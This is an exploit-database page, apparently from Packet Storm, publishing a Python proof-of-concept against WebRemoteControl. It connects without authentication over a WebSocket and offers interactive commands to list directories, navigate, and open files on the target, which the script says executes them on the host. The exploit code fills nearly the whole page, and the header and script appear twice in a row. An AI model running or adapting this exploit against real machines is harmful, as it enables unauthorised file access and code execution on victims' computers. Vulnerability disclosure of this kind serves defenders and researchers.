Description
WebRemoteControl suffers from an unauthenticated remote filesystem access vulnerability. This proof of concept exploit lets you browse directory contents and access files...
Basic Information
ID
PACKETSTORM:218912
Published
Apr 14, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: WebRemoteControl - Unauthenticated Remote Filesystem Access
# Date: 2026-04-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl
# Software Link:
https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip
# Version: SNAPSHOT
# Tested on: Windows 10/11
#!/usr/bin/env python3
import websocket, time
ws = websocket.create_connection("ws://172.16.126.135:8000/docs/cmd",
timeout=5)
ws.recv()
def list_files():
ws.send("fbgetfiles")
time.sleep(0.5)
resp = ws.recv()
parts = resp.split("\t")
if parts[0] == "fblist":
print(f"\n[PATH] {parts[1]}")
for i, item in enumerate(parts[2:]):
print(f" {i}: {item}")
else:
print("[!] Failed to list files")
def open_item(idx):
ws.send(f"fbopen\t{idx}")
time.sleep(0.5)
resp = ws.recv()
if resp.startswith("fblist"):
parts = resp.split("\t")
print(f"[+] Opened folder: {parts[1]}")
else:
print("[+] File executed on host")
def go_up():
ws.send("fbup")
time.sleep(0.5)
ws.recv()
print("""
=== WebRemoteControl File Browser Exploit ===
Commands:
list - show current directory contents
open X - open folder or file at index X
up - go to parent directory
exit - quit
Example:
> list
> open 14
> list
> open 3
> list
> up
> list
""")
while True:
cmd = input("> ").strip().lower()
if cmd == "list":
list_files()
elif cmd.startswith("open"):
try:
open_item(int(cmd.split()[1]))
except:
print("Usage: open <number>")
elif cmd == "up":
go_up()
elif cmd == "exit":
break
else:
print("Commands: list, open <num>, up, exit")
ws.close()
# Date: 2026-04-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl
# Software Link:
https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip
# Version: SNAPSHOT
# Tested on: Windows 10/11
#!/usr/bin/env python3
import websocket, time
ws = websocket.create_connection("ws://172.16.126.135:8000/docs/cmd",
timeout=5)
ws.recv()
def list_files():
ws.send("fbgetfiles")
time.sleep(0.5)
resp = ws.recv()
parts = resp.split("\t")
if parts[0] == "fblist":
print(f"\n[PATH] {parts[1]}")
for i, item in enumerate(parts[2:]):
print(f" {i}: {item}")
else:
print("[!] Failed to list files")
def open_item(idx):
ws.send(f"fbopen\t{idx}")
time.sleep(0.5)
resp = ws.recv()
if resp.startswith("fblist"):
parts = resp.split("\t")
print(f"[+] Opened folder: {parts[1]}")
else:
print("[+] File executed on host")
def go_up():
ws.send("fbup")
time.sleep(0.5)
ws.recv()
print("""
=== WebRemoteControl File Browser Exploit ===
Commands:
list - show current directory contents
open X - open folder or file at index X
up - go to parent directory
exit - quit
Example:
> list
> open 14
> list
> open 3
> list
> up
> list
""")
while True:
cmd = input("> ").strip().lower()
if cmd == "list":
list_files()
elif cmd.startswith("open"):
try:
open_item(int(cmd.split()[1]))
except:
print("Usage: open <number>")
elif cmd == "up":
go_up()
elif cmd == "exit":
break
else:
print("Commands: list, open <num>, up, exit")
ws.close()